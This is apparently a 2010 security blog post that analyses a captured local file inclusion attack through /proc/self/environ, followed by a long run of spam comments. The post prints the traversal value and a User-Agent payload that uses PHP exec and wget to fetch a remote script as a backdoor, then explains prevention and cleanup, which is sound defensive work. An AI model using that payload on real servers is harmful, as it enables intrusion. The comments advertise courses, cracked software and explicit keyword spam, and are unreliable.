Friday, June 25, 2010

The proc/self/environ Injection

Event Details

21 June 2010

POST Values
file: ../../proc/self/environ

HTTP_USER_AGENT: <? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>
This is a simplified version of what was captured in the user agent field.

What the hacker was hoping for
What we have hear is a local file injection attack coupled with injected PHP code.

The visitor hopes that my code that handles file inclusion is written something like this:
// Include file requested

Thus the file that will be included would be:

/var/www/../../proc/self/environ (which equates to /proc/self/environ)

The hacker is attempting to include the proc details about the current Apache thread. /proc/ contains information about all the running threads, /proc/self/ contains the current thread being run). Apache stores various values in the /proc/self/environ (environment variables) such as the visitors IP address, user agent, script called and other values like this:

DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID= HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) PATH=/bin:/usr/bin QUERY_STRING= REMOTE_ADDR=x.x.x.x REMOTE_PORT=xxxx REQUEST_METHOD=GET REQUEST_URI=/index.php SCRIPT_FILENAME=/var/www/index.php SCRIPT_NAME=/index.php SERVER_ADDR=x.x.x.x SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE=
Apache/2.0 (Unix)

However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT), that will be included and executed as PHP code. The PHP code would then execute shell commands to retrieve a remote script, download it to the server and place it in the website folder:

// Fetch remote script and place in /tmp/dump
exec("wget http://[remotescript].txt -O backdoor.php");

Now the hacker can now visit his page and run any commands he wants on your webserver.

How to prevent this

  • Sanitize your inputs
    • Ensure that directory traversal is disabled/checked for
    • Work with an allowed list of files

      $allowed_files = array('file1.php', 'file2.php');
      $allowed_index = array_search($_GET['file'], $allowed_files)
      if ($allowed_index !== NULL)
      include $allowed_files[$allowed_index];

    • Don't allow visitors to specify by name

      $allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
      if (!empty($allowed_files[$_GET['file']]))
      include $allowed_files[$_GET['file']];

Threat Level

Course of Action

If this has happened to you, do the following:
  • Take the server offline (if possible)
  • Check active process list for unknown scripts and kill them
  • Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
  • Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
  • Remove backdoor scripts
  • Monitor you logs. The hacker will probably return and attempt to reinfect your server.


  1. Replies
    1. Great Article Cyber Security Projects projects for cse Networking Security Projects JavaScript Training in Chennai JavaScript Training in Chennai The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training

  2. I appreciate your efforts because it conveys the message of what you are trying to say. It's a great skill to make even the person who doesn't know about the subject could able to understand the subject . Your blogs are understandable and also elaborately described. I hope to read more and more interesting articles from your blog. All the best.

    rpa training in bangalore
    best rpa training in bangalore
    RPA training in bangalore
    rpa course in bangalore
    rpa training in chennai
    rpa online training

  3. Some us know all relating to the compelling medium you present powerful steps on this blog and therefore strongly encourage contribution from other ones on this subject while our own child is truly discovering a great deal. Have fun with the remaining portion of the year.
    python training Course in chennai
    python training in Bangalore
    Python training institute in bangalore


  4. Whoa! I’m enjoying the template/theme of this website. It’s simple, yet effective. A lot of times it’s very hard to get that “perfect balance” between superb usability and visual appeal. I must say you’ve done a very good job with this.

    AWS Training in Bangalore | Best AWS Amazon Web Services…
    Amazon Web Services (AWS) Training in Pune India
    AWS Training | AWS Training and Certification | AWS online training
    AWS Training in Bangalore cost| Aws training in Bangalore with placements

  5. Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog. Really very informative post you shared here. Kindly keep blogging.
    AWS Training in pune

    AWS Online Training

    AWS Training in Bangalore

  6. Great post. I was once checking constantly this weblog and I'm impressed! Extremely useful information specially the closing part. I maintain such information much. I was once seeking this specific information for a very long time. Many thanks and best of luck.
    samsung mobile service center in velachery
    samsung mobile service center in porur
    samsung mobile service center in vadapalani

  7. nice blog
    get best placement at VSIPL

    digital marketing services
    web development company
    seo network point

  8. nice blog
    get best placement at VSIPL

    get digital marketing services
    seo network point

  9. nice blog
    get best placement at VSIPL

    get digital marketing services
    seo network point


  10. Click here to cloud tech.

  11. Thanks for the informative article About AWS.This is one of the best resources I have found in quite some time. Nicely written and great info. I really cannot thank you enough for sharing.
    Java training in chennai | Java training in annanagar | Java training in omr | Java training in porur | Java training in tambaram | Java training in velachery

  12. Thanks for post.I do agree your blog for quiz programming concepts, which is very helpful to grow up your knowledge. keep sharing more

    aws training in chennai | aws training in annanagar | aws training in omr | aws training in porur | aws training in tambaram | aws training in velachery

  13. This is really a very good article about Java.Thanks for taking the time to discuss with us , I feel happy about learning this topic.
    AWS training in chennai | AWS training in annanagar | AWS training in omr | AWS training in porur | AWS training in tambaram | AWS training in velachery

  14. This is really a very good article about Java.Thanks for taking the time to discuss with us , I feel happy about learning this topic.
    AWS training in chennai | AWS training in annanagar | AWS training in omr | AWS training in porur | AWS training in tambaram | AWS training in velachery

  15. I found your blog while searching for the updates, I am happy to be here. Very useful content and also easily understandable providing.. Believe me I did wrote an post about tutorials for beginners with reference of your blog.

    Aws Training in Chennai

    Aws Training in Velachery

    Aws Training in Tambaram

    Aws Training in Porur

    Aws Training in Omr

    Aws Training in Annanagar

  16. I have been searching to find a comfort or effective procedure to complete this process and I think this is the most suitable way to do it effectively. ExcelR Data Science Course In Pune

  17. Cliff Saunders has spent over 20 years as a student of health and wellness and writes about various treatment modalitieskamapisachi nude anveshi jain nude tamanna sex kajal agarwal xxx simran kaur nude disha patani nude actress nude disha patani boobs rashmika mandanna nude

  18. Informative and useful article with detailed explanation. Thanks for sharing Angular training in Chennai

  19. Thanks for sharing the detailed content with all of us, keep writing.
    Data Science Training in Pune

  20. I recently came across your article and have been reading along. I want to express my admiration of your writing skill and ability to make readers read from the beginning to the end.
    Python Classes in Pune

  21. Amazing Articles ! I would like to thank you for the efforts you had made for writing this awesome article. This article inspired me to read more. keep it up.If you are Searching for info click on given link
    Data science course in pune

  22. .You can put a smile on my face even when I don’t feel like smiling at all
    .I think it’s the most amazing thing about our friendship
    .We make each other laugh all the time
    .And it helps a lot to live a life full of complicated stuff
    .Love you, buddy. دانلود آهنگ سهراب پاکزاد نور چشمی

  23. If it's not too much trouble share more like that. Monthly Seo Packages

  24. Great Article… I love to read your articles because your writing style is too good, its is very very helpful for all of us and I never get bored while reading your article because, they are becomes a more and more interesting from the starting lines until the end. best micronutrients for plants

  25. Come up with a great learning experience of Data Science training in Chennai, from Infycle Technologies, the best software training institute in Chennai. Get up with other technical courses like Data Science, Selenium Automation Testing, Mobile App Development, Cyber Security, Big Data, Full Stack Development with a great learning experience and outstanding placements in top IT firms. For best offers with learning, reach us on +91-7504633633, +91-7502633633.

  26. Those Looking for Download Microsoft Office Free find Luck with these Top Searches. You have to see these searches for Download Microsoft Office Free. Microsoft Office Rar

  27. This is completely powerful software that helps it’s users in mainstream. The features of Windows 8 are totally amazing and they works very well. Windows 8.1 Crack Download

  28. “In case you have not made any plans for the weekend yet, it's Thursday. Start planning!” “It's Thursday. I'm breathing. I'm Alive and I'm Blessed. God is Good. Thursday Quotes